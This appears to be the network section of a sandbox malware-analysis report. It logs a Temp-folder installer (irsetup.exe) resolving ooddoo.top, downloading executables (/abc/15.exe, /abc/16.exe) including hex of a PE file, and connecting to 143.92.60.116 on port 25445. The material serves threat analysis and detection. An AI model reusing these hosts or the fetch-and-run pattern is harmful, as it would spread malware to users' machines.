Dec 29, 2024 16:07:29.523320913 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.523340940 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.523432970 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.523442984 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.523484945 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.529228926 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.529244900 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.529309988 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.529315948 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.529371023 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.535115004 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.535131931 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.535207033 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.535226107 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.535283089 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.540931940 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.540947914 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.541014910 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.541023016 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.541062117 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.546113014 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.546128988 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.546191931 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.546200037 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.546238899 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.551943064 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.551959991 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.552016973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.552025080 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.552037954 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.552067995 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.557871103 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.557888031 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.557966948 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.557974100 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.558006048 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.605595112 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.605612040 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.605748892 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.605775118 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.605818987 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.724874973 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.724900961 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.725006104 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.725033998 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.725081921 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.730803967 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.730823994 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.730887890 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.730896950 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.730940104 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.736031055 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.736047983 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.736125946 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.736131907 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.736169100 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.737737894 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.737808943 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.737812996 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.737858057 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.738265991 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.738279104 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:29.738323927 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:29.739161015 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:31.444875002 CET	49771	25445	192.168.2.6	143.92.60.116
Dec 29, 2024 16:07:31.565840006 CET	25445	49771	143.92.60.116	192.168.2.6
Dec 29, 2024 16:07:31.565954924 CET	49771	25445	192.168.2.6	143.92.60.116
Dec 29, 2024 16:07:32.921983957 CET	49771	25445	192.168.2.6	143.92.60.116
Dec 29, 2024 16:07:33.042900085 CET	25445	49771	143.92.60.116	192.168.2.6
Dec 29, 2024 16:09:08.157296896 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:09:08.278532982 CET	80	49735	104.21.81.224	192.168.2.6
Dec 29, 2024 16:09:08.278606892 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:10:33.142255068 CET	49771	25445	192.168.2.6	143.92.60.116
Dec 29, 2024 16:10:33.263174057 CET	25445	49771	143.92.60.116	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 16:07:18.174814939 CET	61059	53	192.168.2.6	1.1.1.1
Dec 29, 2024 16:07:18.320178032 CET	53	61059	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 16:07:18.174814939 CET	192.168.2.6	1.1.1.1	0xff89	Standard query (0)	ooddoo.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 16:06:57.132204056 CET	1.1.1.1	192.168.2.6	0x41e5	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 16:06:57.132204056 CET	1.1.1.1	192.168.2.6	0x41e5	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:06:59.256481886 CET	1.1.1.1	192.168.2.6	0xfff9	No error (0)	fp3011.wpc.2be4.phicdn.net	fp3011.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 29, 2024 16:06:59.256481886 CET	1.1.1.1	192.168.2.6	0xfff9	No error (0)	fp3011.wpc.phicdn.net		152.199.19.74	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:07:18.320178032 CET	1.1.1.1	192.168.2.6	0xff89	No error (0)	ooddoo.top		104.21.81.224	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:07:18.320178032 CET	1.1.1.1	192.168.2.6	0xff89	No error (0)	ooddoo.top		172.67.165.100	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ooddoo.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49735	104.21.81.224	80	6980	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 16:07:18.448807955 CET	188	OUT	GET /abc/15.exe HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Setup Factory 9.0 Host: ooddoo.top Connection: Keep-Alive Cache-Control: no-cache
Dec 29, 2024 16:07:19.595801115 CET	1017	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 29 Dec 2024 15:07:19 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Sun, 29 Dec 2024 16:07:19 GMT Location: https://ooddoo.top/abc/15.exe Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hULfsLbG%2Fah%2BNHb5ucwPUOnzHSc1feaeJlRyPKYcU6pcGCzukpbp0oKmBsv2KqO2NehZPAafa%2BPm7OUyeKRD4j932bn6FS%2B7yoIMwKRIcD44NmpJZ7fXHMa65rw1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9ab2f66ebd42d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1921&min_rtt=1921&rtt_var=960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=188&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Dec 29, 2024 16:07:21.904325962 CET	188	OUT	GET /abc/16.exe HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Setup Factory 9.0 Host: ooddoo.top Connection: Keep-Alive Cache-Control: no-cache
Dec 29, 2024 16:07:22.251657009 CET	1024	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 29 Dec 2024 15:07:22 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Sun, 29 Dec 2024 16:07:22 GMT Location: https://ooddoo.top/abc/16.exe Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uhq03BI2aDSuBkP3UNmaoYlB3pwVYxeFOlfhU0ykQKtyELTm6A9WBT1GWnuP5YjQImJAsSDwMu6%2BZhuEtFR%2BTgCAULbZkqxZyFMWSHNeaExv1TO06W%2BuvFU3ja28"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9ab306fc2f42d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7863&min_rtt=1921&rtt_var=12605&sent=2&recv=5&lost=0&retrans=0&sent_bytes=1017&recv_bytes=376&delivery_rate=29519&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49744	104.21.81.224	443	6980	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 15:07:21 UTC	139	OUT	GET /abc/15.exe HTTP/1.1 Accept: / User-Agent: Setup Factory 9.0 Connection: Keep-Alive Cache-Control: no-cache Host: ooddoo.top
2024-12-29 15:07:21 UTC	794	IN	HTTP/1.1 404 Not Found Date: Sun, 29 Dec 2024 15:07:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 CF-Cache-Status: MISS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGXmr7o9zQZG%2BZQgHg3wvICumi5LhPKkI9TUqC1jzaTlo7Y16KWNl5f1CwaOYruKiTBnoMqE0kSq1EWpqYkAskXXYQ9hHk8BBvQBGYaZpvZVNbwcl7c%2FeSxTHiNN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9ab301f9a10f42-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1476&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=753&delivery_rate=1951871&cwnd=180&unsent_bytes=0&cid=7ecfbd2482096e1f&ts=919&x=0"
2024-12-29 15:07:21 UTC	575	IN	Data Raw: 38 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 Data Ascii: 835<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 -
2024-12-29 15:07:21 UTC	1369	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d Data Ascii: ;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;m
2024-12-29 15:07:21 UTC	164	IN	Data Raw: 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 65 28 62 29 3b 27 6c 6f 61 64 69 6e 67 27 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 28 64 6f 63 75 6d 65 6e 74 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 65 2c 63 28 29 29 7d 7d 7d 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: \|function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script></body></html>
2024-12-29 15:07:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49750	104.21.81.224	443	6980	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 15:07:23 UTC	139	OUT	GET /abc/16.exe HTTP/1.1 Accept: / User-Agent: Setup Factory 9.0 Connection: Keep-Alive Cache-Control: no-cache Host: ooddoo.top
2024-12-29 15:07:24 UTC	898	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 15:07:24 GMT Content-Type: application/octet-stream Content-Length: 2886752 Connection: close Last-Modified: Sun, 29 Dec 2024 14:02:51 GMT ETag: "d71a7059fa59db1:0" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvkE7U2feruJtXPGJkTmMx3tWyggBpRQeIzFudyTUlmgjroGcAb1F28jsVLXdayXi7gcHbiSYXS2P1uqnpIGJdZKVC4%2FN%2FYxcotjVjwwhWg5ba0OcezYBxSnt7l0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9ab311ca760ca4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1528&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=753&delivery_rate=1821584&cwnd=241&unsent_bytes=0&cid=2ac257efed0fd02c&ts=1375&x=0"
2024-12-29 15:07:24 UTC	471	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY\|zuYzuYwzuRich{u
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 4c cb 01 00 00 10 00 00 00 04 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 a0 d1 00 00 00 e0 01 00 00 62 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 68 1c 00 00 00 c0 02 00 00 04 00 00 00 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 dd 8c 02 00 00 e0 02 00 00 c6 00 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 2c 1b 00 00 00 70 05 00 00 18 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 Data Ascii: L ` b@@ hj@ n@@ ,p4@B.idata
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 45 e9 93 38 15 63 71 bf 91 95 66 7e f8 44 14 3b 9e ba 70 36 c4 11 a7 04 14 0c 18 94 65 1c 4e b4 36 e6 e2 40 4e 64 54 4d 7c 44 33 1c 48 4d 0b 45 69 3b 96 48 da e5 93 1b e8 d3 de 10 a7 44 0e 94 fc dd a8 56 d7 0b 0a d7 46 53 82 c6 b4 64 05 ff 95 bd e2 4b 28 dd a6 85 10 27 bf e8 20 b9 66 34 5c 00 e6 66 ec b2 5f 8d 66 c9 59 55 27 e9 76 c6 c6 63 de c4 97 65 32 30 ef 5f a3 14 18 56 9f d4 f9 21 ee d8 76 f1 6d ba dc a6 70 e2 3a 01 da 39 3b d3 af 92 6b 94 9f 5e 3c b9 dc a6 cc f1 23 72 9c fa aa 55 f0 51 2e 1f 56 37 82 d8 53 3b 67 d0 3c e3 dd 58 fd ff 6a b3 61 71 66 af 59 a6 e1 87 eb 73 a9 8f 20 03 cc b8 50 6a a4 2f 7f 37 b2 43 6a 45 fb 49 2b 5b 6e 17 2e cd 89 98 e1 9e bf 99 c3 0e f7 1f 6f a3 62 ff 05 01 52 6e 3e b5 d0 37 da ec e3 d0 44 df df 12 1f 37 15 6c 54 3d 66 Data Ascii: E8cqf~D;p6eN6@NdTM\|D3HMEi;HDVFSdK(' f4\f_fYU'vce20_V!vmp:9;k^<#rUQ.V7S;g<XjaqfYs Pj/7CjEI+[n.obRn>7D7lT=f
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 66 1f e5 f4 af be 8a e4 3a 20 7b 24 7b 90 69 9e 5a 66 12 41 7e a2 73 74 f1 51 2a 65 8e 5a 12 4c 91 3b 6c be f4 4e a7 1a 08 30 77 27 3d 46 27 a2 56 2d d9 f4 d7 6a b0 3c e0 e3 0d 94 2f 74 35 bb fd 20 05 31 e2 d9 24 cf 18 5a c5 1a 81 fc 32 eb 4c eb 17 9a 6c c5 8d 29 73 a0 a4 a6 b4 fd 4a 94 e8 d5 24 3f 4a 8d 2c dc 73 f6 bd 03 24 8c 82 6d 4f 06 f1 5c 56 8b 6b 9f e7 e5 df 13 f7 6c ac f5 22 a8 30 df 0c 76 4c 3b 0b 90 6e 56 fb df 92 c9 69 a3 76 7e e4 75 4d 62 40 8e 67 65 a9 d8 b4 d3 2a 66 1e b9 fd 6f bd 00 82 65 95 55 25 46 e5 f3 d2 be 4c 42 f9 6d be 38 c1 d8 cf 03 16 6a d0 ab e2 d8 b5 31 9b 9a 60 f4 c9 8d 9c 1d 62 b8 56 20 7a e3 f4 36 ef 5e 25 ec e6 e6 eb 00 e9 8d 9d 7c d5 46 cd 8b e2 a5 be 05 65 79 bc b0 e5 78 f6 7c 03 76 54 ee ec db 04 4e 79 f7 82 25 73 63 c7 Data Ascii: f: {${iZfA~stQeZL;lN0w'=F'V-j</t5 1$Z2Ll)sJ$?J,s$mO\Vkl"0vL;nViv~uMb@gefoeU%FLBm8j1`bV z6^%\|Feyx\|vTNy%sc
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 12 d3 d8 f3 d2 05 9f ca a7 c7 94 7a 86 6e eb 57 d9 8d 23 f2 1b 43 9a 78 3e 1c 93 f5 f3 ec 8d c6 64 94 88 f7 79 8f df a4 d9 c5 79 d1 cb e6 10 be 7b 6f ef ec 31 17 49 d9 b3 f4 c8 f4 9f 3d a4 51 12 68 e5 6c aa 49 2a 36 a1 14 db 73 19 f5 a0 5a 6f 71 c4 69 63 3d ca 5d 6c bb 22 05 5f 4c e3 f6 61 7c 18 1c 48 b3 1a 55 81 47 2f dc 41 4b 78 d8 b1 4f 95 95 d3 24 85 a7 e3 48 a4 81 b3 fb ce a3 a0 3e 2d ee e0 3e 76 d4 97 52 18 2a ae 6a 8a f9 0d 4e 97 99 ca ac ff c5 88 fc 19 cc 87 c7 94 85 74 6a d3 f5 7a 79 3a 58 5a 5a 9f a9 3e 67 05 3a 5f 71 0a 70 eb f1 44 67 65 d0 72 d9 06 9e 15 07 de 81 fc 9d f1 01 25 99 60 f7 3d e6 6f 25 65 00 37 d8 16 93 b5 e0 90 04 7b fc 64 06 a0 7c 3e 55 bf f1 55 46 68 fb 73 71 2e c5 b4 69 e0 cc 59 89 42 92 03 fa 64 f2 e6 0b 76 bf 7a 19 46 5e 24 Data Ascii: znW#Cx>dyy{o1I=QhlI6sZoqic=]l"_La\|HUG/AKxO$H>->vRjNtjzy:XZZ>g:_qpDger%`=o%e7{d\|>UUFhsq.iYBdvzF^$
2024-12-29 15:07:24 UTC	1369	IN	Data Raw: 5a 37 9c ab d5 15 66 04 40 37 9d cc c0 93 36 3c 47 aa 25 9a 4d 51 43 21 ef 00 04 83 63 e5 67 c0 4c d6 e6 2d 5b 6e f9 94 4c 67 ee 7a 28 e0 e3 ff 53 c9 ac 69 4a 98 bd 16 eb 97 59 62 da ca 47 79 8c 71 1d e5 6a 2e fa 94 e3 2a 65 06 b7 b5 ff 6a 5f 80 ac 9b 8b f8 0d fc 48 56 a0 5c c7 eb ca db 4b 1d f0 0b 9a 1c c5 02 92 55 4e 83 28 9c 0b 07 4e 92 03 8f 25 cb b9 82 26 3d 31 e2 bf 0f ac 50 cd 4b f5 4d 28 51 7c 7b 8f ee f6 aa 14 2b 97 92 68 4b 63 6f e0 a8 cd be 1e 0d f3 99 71 21 d7 8f 28 4d c3 2b d1 cc fc 99 26 2c 3a 72 8b e0 af 76 3e b0 b5 34 7f da 96 52 4d fc 2e e9 cc 58 09 25 dd e9 e4 c8 a0 8c a1 25 00 83 b5 30 44 87 b2 66 1c b5 ba 58 56 37 fe 65 24 3a b9 1b 41 89 10 a9 04 d5 98 1a 82 4d fe 38 0e 0a 22 9b 2b 1d 1a 86 ce b1 78 c2 d9 3b 1c b5 60 e8 28 9e 3d 98 41 Data Ascii: Z7f@76<G%MQC!cgL-[nLgz(SiJYbGyqj.*ej_HV\KUN(N%&=1PKM(Q\|{+hKcoq!(M+&,:rv>4RM.X%%0DfXV7e$:AM8"+x;`(=A
